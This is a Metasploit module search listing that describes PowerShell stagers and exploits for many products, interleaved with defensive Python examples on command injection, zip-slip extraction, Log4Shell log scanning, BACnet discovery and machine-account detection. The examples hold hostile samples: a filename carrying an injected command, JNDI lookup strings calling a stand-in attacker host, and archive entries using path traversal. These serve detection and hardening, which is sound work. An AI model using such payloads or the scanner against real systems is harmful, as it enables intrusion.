6843 matches found
Powershell Exec, Windows shellcode stage, Windows Reverse HTTP Stager (wininet)
Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTP (Windows wininet).
Module: payload/cmd/windows/powershell/custom/reversehttp

Powershell Exec, Windows shellcode stage, Reverse HTTPS Stager with Support for Custom Proxy
Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTP using SSL, with custom proxy support.
Module: payload/cmd/windows/powershell/custom/reversehttpsproxy

Powershell Exec, Windows shellcode stage, Hidden Bind TCP Stager
Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection from a hidden port and spawn a command shell to the allowed host.
Module: payload/cmd/windows/powershell/custom/bindhiddentcp

Powershell Exec, Windows shellcode stage, Bind IPv6 TCP Stager (Windows x86)
Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for an IPv6 connection (Windows x86).
Module: payload/cmd/windows/powershell/custom/bindipv6tcp

Powershell Exec, Windows shellcode stage, Reverse All-Port TCP Stager
Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Try to connect back to the attacker on all possible ports (1-65535), slowly.
Module: payload/cmd/windows/powershell/custom/reversetcpallports

Powershell Exec, Windows shellcode stage, Reverse TCP Stager (DNS)
Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker.
Module: payload/cmd/windows/powershell/custom/reversetcpdns

Powershell Exec, Windows shellcode stage, Reverse Ordinal TCP Stager (No NX or Win7)
Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker.
Module: payload/cmd/windows/powershell/custom/reverseordtcp

Powershell Exec, Windows shellcode stage, Windows Reverse HTTPS Stager (wininet)
Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTPS (Windows wininet).
Module: payload/cmd/windows/powershell/custom/reversehttps

Powershell Exec, Windows shellcode stage, Reverse TCP Stager (IPv6)
Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker over IPv6.
Module: payload/cmd/windows/powershell/custom/reverseipv6tcp

Apache Spark Unauthenticated Command Injection RCE
This module exploits an unauthenticated command injection vulnerability in Apache Spark. Successful exploitation results in remote code execution under the context of the Spark application user. The command injection occurs because Spark checks the group membership of the user passed in the ?doAs...

Cisco ASA-X with FirePOWER Services Authenticated Command Injection
This module exploits an authenticated command injection vulnerability affecting Cisco ASA-X with FirePOWER Services. The exploit is executed through the ASA's ASDM web server and lands in the FirePOWER Services SFR module's Linux virtual machine as the root user. Access to the virtual machine...

ManageEngine DataSecurity Plus Xnode Enumeration
This module exploits default admin credentials for the DataEngine Xnode server in DataSecurity Plus versions prior to 6.0.1 (build 6011) in order to dump the contents of Xnode data repositories (tables), which may contain a limited amount of Active Directory information including domain names, host names,...

ManageEngine ADAudit Plus Xnode Enumeration
This module exploits default admin credentials for the DataEngine Xnode server in ADAudit Plus versions prior to 6.0.3 (build 6032) in order to dump the contents of Xnode data repositories (tables), which may contain a limited amount of Active Directory information including domain names, host names,...

Zyxel Firewall SUID Binary Privilege Escalation
This module exploits CVE-2022-30526, a local privilege escalation vulnerability that allows a low-privileged user (e.g. nobody) to escalate to root. The issue stems from a SUID binary that allows all users to copy files as root. This module overwrites the firewall's crontab to execute an attacker...

ICPR Certificate Management
Request certificates via MS-ICPR (Active Directory Certificate Services). Depending on the certificate template's configuration, the resulting certificate can be used for various operations such as authentication. PFX certificate files that are saved are encrypted with a blank password. This module ...

ManageEngine ADAudit Plus CVE-2022-28219
This module exploits CVE-2022-28219, which is a pair of vulnerabilities in ManageEngine ADAudit Plus versions before build 7060: a path traversal in the /cewolf endpoint, and a blind XXE in, to upload and execute an executable file.

Zoho Password Manager Pro XML-RPC Java Deserialization
This module exploits a Java deserialization vulnerability in Zoho ManageEngine Password Manager Pro before 12101 and PAM360 before 5510. Unauthenticated attackers can send a crafted XML-RPC request containing malicious serialized data to /xmlrpc to gain RCE as the SYSTEM user.

Microsoft Exchange Server ChainedSerializationBinder RCE
This module exploits vulnerabilities within the ChainedSerializationBinder as used in Exchange Server 2019 CU10, Exchange Server 2019 CU11, Exchange Server 2016 CU21 and Exchange Server 2016 CU22, all prior to Mar22SU. Note that authentication is required to exploit these vulnerabilities.

Advantech iView NetworkServlet Command Injection
Versions of Advantech iView software below 5.7.04.6469 are vulnerable to an unauthenticated command injection via the NetworkServlet endpoint. The database backup functionality passes a user-controlled parameter, backupfile, to the mysqldump command. The sanitization functionality on...

VMware Workspace ONE Access CVE-2022-31660
VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges to those of the root user by modifying a file and then restarting the vmware-certproxy service, which invokes it. The service control is permitted via the sudo configuration without a...

Zimbra zmslapd arbitrary module load
This module exploits CVE-2022-37393, which is a vulnerability in Zimbra's sudo configuration that permits the zimbra user to execute the zmslapd binary as root with arbitrary parameters. As part of its intended functionality, zmslapd can load a user-defined configuration file, which includes...

Roxy-WI Prior to 6.1.1.0 Unauthenticated Command Injection RCE
This module exploits an unauthenticated command injection vulnerability in Roxy-WI prior to version 6.1.1.0. Successful exploitation results in remote code execution under the context of the web server user. Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers.

UnRAR Path Traversal (CVE-2022-30333)
This module creates a RAR file that exploits CVE-2022-30333, which is a path-traversal vulnerability in unRAR that can extract an arbitrary file to an arbitrary location on a Linux system. UnRAR fixed this vulnerability in version 6.12 (open source version 6.1.7). The core issue is that when a...

Webmin Package Updates RCE
This module exploits an arbitrary command injection in Webmin versions prior to 1.997. Webmin uses the OS package manager (apt, yum, etc.) to perform package updates and installation. Due to a lack of input sanitization, it is possible to inject an arbitrary command that will be concatenated to the...
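
Several of the entries above (the Apache Spark ?doAs group check, the Advantech iView backupfile parameter, Roxy-WI, and the Webmin package-update flow) are one bug class: a request parameter spliced into a string that a shell then parses. The Python below is an added example, not code from any of these modules or from the products they target. It contrasts the injectable construction with a validated, argv-only form. The mysqldump arguments, the /var/backups path, the allowlist pattern and the `id -Gn` group lookup are assumptions chosen for the illustration, not what the affected products actually run.

```python
import re
import subprocess
from typing import List

# Constructed inputs (not taken from any of the modules above): a normal
# backup-file name, and the same field carrying a shell command.
BENIGN = "nightly.sql"
HOSTILE = "nightly.sql; id > /tmp/pwned #"

def vulnerable_command(backupfile: str) -> str:
    """The anti-pattern: a request parameter concatenated into a string that
    /bin/sh will parse, so ';' ends the intended command and starts another."""
    return "mysqldump --all-databases > /var/backups/" + backupfile

def vulnerable_argv(backupfile: str) -> List[str]:
    """Launching the shell explicitly is the same bug in a different spelling:
    the user-controlled string is still parsed by a shell."""
    return ["bash", "-c", vulnerable_command(backupfile)]

# Allowlist (an assumption for this example) for a user-supplied file or
# account name: letters, digits, '.', '_' and '-'; no path or shell syntax.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")

def validate_name(value: str) -> str:
    """Return value unchanged if it matches the allowlist, else raise."""
    if SAFE_NAME.fullmatch(value) is None or ".." in value:
        raise ValueError("rejected unsafe name: %r" % (value,))
    return value

def is_safe_name(value: str) -> bool:
    try:
        validate_name(value)
        return True
    except ValueError:
        return False

def hardened_backup_argv(backupfile: str) -> List[str]:
    """Fixed form: validate, then hand the value over as a single argv element.
    mysqldump writes its own output file, so no shell redirection is needed."""
    return ["mysqldump", "--all-databases",
            "--result-file=/var/backups/" + validate_name(backupfile)]

def hardened_group_lookup_argv(user: str) -> List[str]:
    """Group lookup of the kind a ?doAs=<user> ACL check performs, assumed here
    to be `id -Gn <user>`, with the name validated and passed as argv."""
    return ["id", "-Gn", validate_name(user)]

def run(argv: List[str]) -> subprocess.CompletedProcess:
    """shell=False: argv goes straight to execve(), so metacharacters stay inert."""
    return subprocess.run(argv, shell=False, capture_output=True, text=True)
```

Rejecting rather than escaping is deliberate: shlex.quote would make the value safe for one shell, but the same value also ends up as a filename and in logs, where a permissive character set causes other trouble.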
UnRAR Path Traversal in Zimbra (CVE-2022-30333)
This module creates a RAR file that can be emailed to a Zimbra server to exploit CVE-2022-30333. If successful, it plants a JSP-based backdoor in the public web directory, then executes that backdoor. The core vulnerability is a path-traversal issue in unRAR that can extract an arbitrary file to ...

Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)
This module POSTs a ZIP file containing path traversal characters to the administrator interface for Zimbra Collaboration Suite. If successful, it plants a JSP-based backdoor within the web directory, then executes it. The core vulnerability is a path-traversal issue in Zimbra Collaboration Suite...
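
The UnRAR (CVE-2022-30333) and Zimbra mboximport (CVE-2022-27925) entries both come down to an archive entry name being written outside the extraction directory. The Python below is an added example, not code from either module or from Zimbra or unRAR: it builds a constructed ZIP with two traversal entries (one using backslash separators) and shows the containment check an extractor should apply, normalising separators before resolving the path rather than after. The entry names and the throwaway extraction directory are constructed for the example.

```python
import io
import os
import tempfile
import zipfile
from typing import List, Tuple

def build_sample_zip() -> bytes:
    """Constructed ZIP (not a real exploit artifact): one benign entry and two
    entries whose names try to climb out of the extraction directory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("mailbox/message.eml", "Subject: hello\r\n\r\nbody\r\n")
        zf.writestr("../../webapps/public/shell.jsp", "<%-- placeholder --%>")
        zf.writestr("docs\\..\\..\\evil.txt", "x")   # backslash separators
    return buf.getvalue()

def is_contained(dest_root: str, member_name: str) -> bool:
    """True only if member_name resolves to a path inside dest_root.
    Separators are normalised *before* the check: treating '\\' as a
    separator only after validation is how an extractor ends up writing
    outside its target directory."""
    name = member_name.replace("\\", "/")
    if name.startswith("/") or (len(name) > 1 and name[1] == ":"):
        return False                        # absolute POSIX or drive-letter path
    root = os.path.realpath(dest_root)
    target = os.path.realpath(os.path.join(root, *name.split("/")))
    return target == root or target.startswith(root + os.sep)

def safe_extract(zip_bytes: bytes, dest_root: str) -> Tuple[List[str], List[str]]:
    """Extract only contained members; return (accepted, rejected) entry names."""
    accepted, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not is_contained(dest_root, info.filename):
                rejected.append(info.filename)
                continue
            parts = info.filename.replace("\\", "/").split("/")
            out = os.path.join(os.path.realpath(dest_root), *parts)
            if info.is_dir():
                os.makedirs(out, exist_ok=True)
            else:
                os.makedirs(os.path.dirname(out), exist_ok=True)
                with zf.open(info) as src, open(out, "wb") as dst:
                    dst.write(src.read())
            accepted.append(info.filename)
    return accepted, rejected

def demo() -> Tuple[List[str], List[str]]:
    """Extract the constructed sample into a throwaway directory."""
    with tempfile.TemporaryDirectory() as tmp:
        return safe_extract(build_sample_zip(), tmp)
```

Resolving with os.path.realpath also defeats the symlink variant, where an earlier entry plants a link and a later entry writes through it: the check is made against the real on-disk location at extraction time, not against the literal entry name.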
MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell)
MobileIron Core is affected by the Log4Shell vulnerability, whereby a JNDI string sent to the server will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS command execution in the context of the tomcat user. This module will start an LDAP server that...
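
Because the MobileIron entry depends on a JNDI lookup string reaching a vulnerable Log4j, the detection side is worth showing. The Python below is an added example rather than anything from the module: it collapses the common Log4j lookup obfuscations (${lower:}, ${upper:}, ${::-} and ${x:y:-z} default clauses) before matching ${jndi:...}, and reports the scheme and callback host. The access-log lines and the 203.0.113.7 address are constructed sample data.

```python
import re
from typing import List, Tuple

# Constructed access-log lines (not from any real incident). The User-Agent of
# lines 2-4 carries a JNDI lookup: plainly, and in two obfuscated spellings.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.7:1389/a}"
10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}${upper:n}di:${::-l}${::-d}ap://203.0.113.7:1389/b}"
10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET /login HTTP/1.1" 302 "-" "${${env:NOPE:-j}ndi:rmi://203.0.113.7:1099/c}"
10.0.0.2 - - [10/Dec/2021:12:00:05 +0000] "GET /docs HTTP/1.1" 200 "-" "curl/7.79 ${date:yyyy}"
"""

# Innermost Log4j lookups that evaluate to a literal: ${lower:x}, ${upper:x},
# ${::-x} and ${prefix:name:-x} (the ':-' default clause of an unresolvable key).
_LITERAL_LOOKUP = re.compile(
    r"\$\{(?:lower|upper):([^{}$]*)\}"        # group 1: case-mapped literal
    r"|\$\{[A-Za-z]*:[^{}$]*:-([^{}$]*)\}"     # group 2: default value
)
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/}\s]+)", re.IGNORECASE)

def deobfuscate(text: str, max_rounds: int = 10) -> str:
    """Collapse nested literal lookups from the inside out until stable."""
    for _ in range(max_rounds):
        new = _LITERAL_LOOKUP.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text)
        if new == text:
            break
        text = new
    return text

def scan(log: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, scheme, host:port) for every JNDI lookup found."""
    hits = []
    for n, line in enumerate(log.splitlines(), 1):
        m = _JNDI.search(deobfuscate(line))
        if m:
            hits.append((n, m.group(1).lower(), m.group(2)))
    return hits
```

The host:port in each hit is the callback address the vulnerable server would contact, which is the value to pivot on in egress logs; the scheme distinguishes the LDAP path (the one the MobileIron module uses) from RMI and DNS variants.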
BACnet Scanner
Discover BACnet devices by broadcasting a Who-Is message, then poll discovered devices for properties including model name, software version, firmware revision and description.
Module: auxiliary/scanner/scada/bacnetl3
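
To make the Who-Is/I-Am exchange behind the BACnet scanner concrete, here is an added Python example (not the module's own code). It builds the Who-Is broadcast frame (BVLC Original-Broadcast-NPDU, NPDU addressed to the global network, unconfirmed service 8), decodes an I-Am reply into device instance, maximum APDU length, segmentation support and vendor id, and includes a discover() helper that sends on UDP 47808. The sample I-Am bytes (device instance 1234, vendor id 15) are constructed.

```python
import socket
import struct
from typing import List, Optional, Tuple

BACNET_PORT = 0xBAC0  # 47808

def build_who_is(low: Optional[int] = None, high: Optional[int] = None) -> bytes:
    """Who-Is (unconfirmed service 8) in an NPDU addressed to the global
    broadcast network, wrapped in a BVLC Original-Broadcast-NPDU header."""
    apdu = bytes([0x10, 0x08])                 # PDU type 1 (unconfirmed), service 8
    if low is not None and high is not None:   # optional instance range: context tags 0 and 1
        apdu += bytes([0x0B]) + low.to_bytes(3, "big") + bytes([0x1B]) + high.to_bytes(3, "big")
    # version 1, control 0x20 (DNET present), DNET 0xFFFF (global), DLEN 0, hop count 255
    npdu = bytes([0x01, 0x20, 0xFF, 0xFF, 0x00, 0xFF])
    body = npdu + apdu
    return struct.pack("!BBH", 0x81, 0x0B, 4 + len(body)) + body

def _decode_app_tags(apdu: bytes) -> List[Tuple[int, bytes]]:
    """Split application-tagged values into (tag_number, raw_value) pairs."""
    out, i = [], 0
    while i < len(apdu):
        tag, i = apdu[i], i + 1
        number, length = tag >> 4, tag & 0x07
        if tag & 0x08:
            raise ValueError("context tag where an application tag was expected")
        if length == 5:                        # extended length lives in the next byte
            length, i = apdu[i], i + 1
        out.append((number, apdu[i:i + length]))
        i += length
    return out

def parse_i_am(frame: bytes) -> dict:
    """Decode an I-Am reply: device instance, max APDU, segmentation, vendor id."""
    bvlc_type, _func, length = struct.unpack("!BBH", frame[:4])
    if bvlc_type != 0x81 or length != len(frame):
        raise ValueError("not a well-formed BACnet/IP frame")
    control, off = frame[5], 6
    if control & 0x20:                          # DNET, DLEN, DADR
        off += 3 + frame[off + 2]
    if control & 0x08:                          # SNET, SLEN, SADR
        off += 3 + frame[off + 2]
    if control & 0x20:
        off += 1                                # hop count follows the address fields
    apdu = frame[off:]
    if apdu[0] >> 4 != 0x1 or apdu[1] != 0x00:  # unconfirmed request, service 0 = I-Am
        raise ValueError("not an unconfirmed I-Am")
    values = _decode_app_tags(apdu[2:])
    (obj_tag, obj), (_, max_apdu), (_, seg), (_, vendor) = values[:4]
    if obj_tag != 12 or len(obj) != 4:
        raise ValueError("missing object identifier")
    obj_id = int.from_bytes(obj, "big")
    if obj_id >> 22 != 8:                       # object type 8 = device
        raise ValueError("I-Am object is not a device")
    return {
        "instance": obj_id & 0x3FFFFF,
        "max_apdu": int.from_bytes(max_apdu, "big"),
        "segmentation": int.from_bytes(seg, "big"),
        "vendor_id": int.from_bytes(vendor, "big"),
    }

# Constructed I-Am: unicast BVLC (0x0A), no NPDU addressing, device 1234,
# max APDU 1152, segmentation 0 (both), vendor id 15.
SAMPLE_I_AM = bytes.fromhex("810a0014" "0100" "1000" "c4020004d2" "220480" "9100" "210f")

def discover(timeout: float = 3.0, bcast: str = "255.255.255.255") -> List[dict]:
    """Broadcast Who-Is on the local segment and collect I-Am replies (needs a network)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    s.settimeout(timeout)
    s.bind(("", BACNET_PORT))                   # replies come back to 47808
    s.sendto(build_who_is(), (bcast, BACNET_PORT))
    found = []
    try:
        while True:
            data, addr = s.recvfrom(1500)
            try:
                found.append(dict(parse_i_am(data), ip=addr[0]))
            except ValueError:
                continue                        # not an I-Am; ignore
    except socket.timeout:
        pass
    finally:
        s.close()
    return found
```

discover() binds the standard port, so it will fail if a local BACnet stack already owns 47808; a directed broadcast for the target subnet is usually more reliable than 255.255.255.255 on multi-homed hosts.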
Cisco PVC2300 POE Video Camera configuration download
This module exploits an information disclosure vulnerability in Cisco PVC2300 cameras in order to download the configuration file containing the admin credentials for the web interface. The module first performs a basic check to see if the target is likely a Cisco PVC2300. If so, the module attempt...

Cassandra Web File Read Vulnerability
This module exploits an unauthenticated directory traversal vulnerability in Cassandra Web version 0.5.0 and earlier, allowing arbitrary file read with the web server's privileges. The vulnerability is due to the Rack::Protection module being disabled.

Cisco ASA ASDM Brute-force Login
This module scans for the Cisco ASA ASDM landing page and performs a login brute-force to identify valid credentials.
Module: auxiliary/scanner/http/ciscoasaasdmbruteforce

Cisco ASA Clientless SSL VPN (WebVPN) Brute-force Login Utility
This module scans for Cisco ASA Clientless SSL VPN (WebVPN) web login portals and performs a login brute-force to identify valid credentials.
Module: auxiliary/scanner/http/ciscoasaclientlessvpn

LDAP Query and Enumeration Module
This module allows users to query an LDAP server using either a custom LDAP query or a set of LDAP queries under a specific category. Users can also specify a JSON or YAML file containing custom queries to be executed using the RUNQUERYFILE action. If this action is specified, then QUERYFILEPATH...

JBOSS EAP/AS Remoting Unified Invoker RCE
An unauthenticated attacker with network access to the JBOSS EAP/AS ...
Module: exploit/multi/misc/jbossremotingunifiedinvokerrce

Sourcegraph gitserver sshCommand RCE
A vulnerability exists within Sourcegraph's gitserver component that allows a remote attacker to execute arbitrary OS commands by modifying the core.sshCommand value within the git configuration. This command can then be triggered on demand by executing a git push operation. The vulnerability was...

FreeSWITCH Event Socket Login
This module tests FreeSWITCH Event Socket logins on a range of machines and reports successful attempts.
Module: auxiliary/scanner/misc/freeswitcheventsocketlogin

DFSCoerce
Coerce an authentication attempt over SMB to other machines via MS-DFSNM methods.
Module: auxiliary/scanner/dcerpc/dfscoerce

SAMR Computer Management
Add, look up and delete computer (machine) accounts via MS-SAMR. By default, standard Active Directory users can add up to 10 new computers to the domain. Administrative privileges, however, are required to delete the created accounts.
Module: auxiliary/admin/dcerpc/samrcomputer
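
The SAMR Computer Management entry relies on the default ms-DS-MachineAccountQuota of 10, which is also a detection opportunity. The Python below is an added example, not part of the module: it runs simple logic over constructed Windows Security events (4741 computer account created, 4743 computer account deleted) and flags creations by accounts outside an assumed provisioning allowlist, bursts of creations, quota exhaustion, and deletions by non-provisioning subjects. The event records, the account names and the AUTHORISED_JOINERS set are assumptions made for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import List

# Constructed Windows Security events, field names as the audit log emits them:
# 4741 = a computer account was created, 4743 = a computer account was deleted.
SAMPLE_EVENTS = [
    {"EventID": 4741, "TimeCreated": "2022-08-01T09:00:00", "SubjectUserName": "svc-sccm", "TargetUserName": "WKS-1001$"},
    {"EventID": 4741, "TimeCreated": "2022-08-01T13:12:05", "SubjectUserName": "jdoe", "TargetUserName": "DESKTOP-7KQ2$"},
    {"EventID": 4741, "TimeCreated": "2022-08-01T13:12:07", "SubjectUserName": "jdoe", "TargetUserName": "DESKTOP-7KQ3$"},
    {"EventID": 4741, "TimeCreated": "2022-08-01T13:12:09", "SubjectUserName": "jdoe", "TargetUserName": "DESKTOP-7KQ4$"},
    {"EventID": 4743, "TimeCreated": "2022-08-01T13:40:00", "SubjectUserName": "jdoe", "TargetUserName": "DESKTOP-7KQ4$"},
    {"EventID": 4741, "TimeCreated": "2022-08-02T08:00:00", "SubjectUserName": "svc-sccm", "TargetUserName": "WKS-1002$"},
]

# Assumed for the example: the accounts that legitimately join machines.
AUTHORISED_JOINERS = {"svc-sccm", "helpdesk-join"}
# AD default ms-DS-MachineAccountQuota: computer objects an ordinary user may create.
MACHINE_ACCOUNT_QUOTA = 10

def detect(events: List[dict], window: timedelta = timedelta(hours=1), burst: int = 2) -> List[str]:
    """Return one alert string per suspicious event, in time order."""
    alerts: List[str] = []
    created_by = defaultdict(list)            # subject -> timestamps of its 4741s
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        who, target = ev["SubjectUserName"], ev["TargetUserName"]
        ts = datetime.fromisoformat(ev["TimeCreated"])
        if ev["EventID"] == 4741:
            created_by[who].append(ts)
            if who not in AUTHORISED_JOINERS:
                alerts.append(f"4741 {target} created by non-provisioning account {who}")
            recent = [t for t in created_by[who] if ts - t <= window]
            if len(recent) == burst:          # fire once, when the burst threshold is reached
                alerts.append(f"burst: {who} created {burst} computer accounts within {window}")
            if who not in AUTHORISED_JOINERS and len(created_by[who]) >= MACHINE_ACCOUNT_QUOTA:
                alerts.append(f"quota: {who} has created {len(created_by[who])} computer accounts "
                              f"(quota {MACHINE_ACCOUNT_QUOTA})")
        elif ev["EventID"] == 4743 and who not in AUTHORISED_JOINERS:
            # Deleting a computer account requires administrative rights, so a
            # plain user managing to do it is itself worth a look.
            alerts.append(f"4743 {target} deleted by {who}: deletion requires administrative rights")
    return alerts
```

A creation by an ordinary user is not malicious on its own (the quota exists so that users can join their own workstations); the burst and the follow-on use of the new account (Kerberos tickets for it, RBCD or certificate requests in its name) are what turn the event into a lead.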
Decrypt Citrix NetScaler Config Secrets
This module takes a Citrix NetScaler ns.conf configuration file as input and extracts secrets that have been stored with reversible encryption. The module supports legacy NetScaler encryption (RC4) as well as the newer AES-256-ECB and AES-256-CBC encryption types. It is also possible to decrypt...

VMware vCenter Extract Secrets from vmdir / vmafd DB File
Grab certificates from the vCenter server vmdird and vmafd database files and add them to loot. The vmdird MDB database file can be found on the live appliance under the path /storage/db/vmware-vmdir/data.mdb, and the vmafd DB is under the path /storage/db/vmware-vmafd/afd.db. The vmdir database...

Atlassian Confluence Namespace OGNL Injection
This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to evaluate an OGNL expression, resulting in OS command execution.
Module: exploit/multi/http/atlassianconfluencenamespaceognlinjection

Microsoft Office Word MSDTJS
This module generates a malicious Microsoft Word document that, when loaded, will leverage the remote template feature to fetch an HTML document and then use the ms-msdt scheme to execute PowerShell code.
Module: exploit/windows/fileformat/wordmsdtjsrce

DotCMS RCE via Arbitrary File Upload
When files are uploaded into dotCMS via the content API, but before they become content, dotCMS writes the file down in a temp directory. In the case of this vulnerability, dotCMS does not sanitize the filename passed in via the multipart request header and thus does not sanitize the temp file's...

MyBB Admin Control Code Injection RCE
This exploit module leverages an improper input validation vulnerability in MyBB prior to 1.8.30 to execute arbitrary code in the context of the user running the application. The MyBB Admin Control setting page calls the PHP eval function with unsanitized user input. The exploit adds a new setting,...

Print Spooler Remote DLL Injection
The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted DCERPC request, resulting in remote code execution as NT AUTHORITY\SYSTEM. This module uses the MS-RPRN vector, which requires the Print Spooler service to be running.

Bookmarked Sites Retriever
This module discovers information about a target by retrieving their bookmarked websites from Google Chrome, Opera and Microsoft Edge.
Module: post/windows/gather/getbookmarks

Zyxel Firewall ZTP Unauthenticated Command Injection
This module exploits CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. By sending a malicious setWanPortSt command containing an mtu field with a crafted OS command to the /ztp/cgi-bin/handler page, an...

VMware vCenter Forge SAML Authentication Credentials
This module forges valid SAML credentials for vCenter server using the vCenter SSO IdP certificate, IdP private key and VMCA certificates as input objects; you must also provide the vCenter SSO domain name and vCenter FQDN. The module will return a session cookie for the /ui path that grants...

F5 BIG-IP iControl RCE via REST Authentication Bypass
This module exploits an authentication bypass vulnerability in the F5 BIG-IP iControl REST service to gain access to the admin account, which is capable of executing commands through the /mgmt/tm/util/bash endpoint. Successful exploitation results in remote code execution as the root user.

Powershell Exec, Reverse TCP Stager with UUID Support (Windows x64)
Execute an x64 payload from a command via PowerShell. Connect back to the attacker with UUID support (Windows x64).
Module: payload/cmd/windows/powershell/x64/vncinject/reversetcpuuid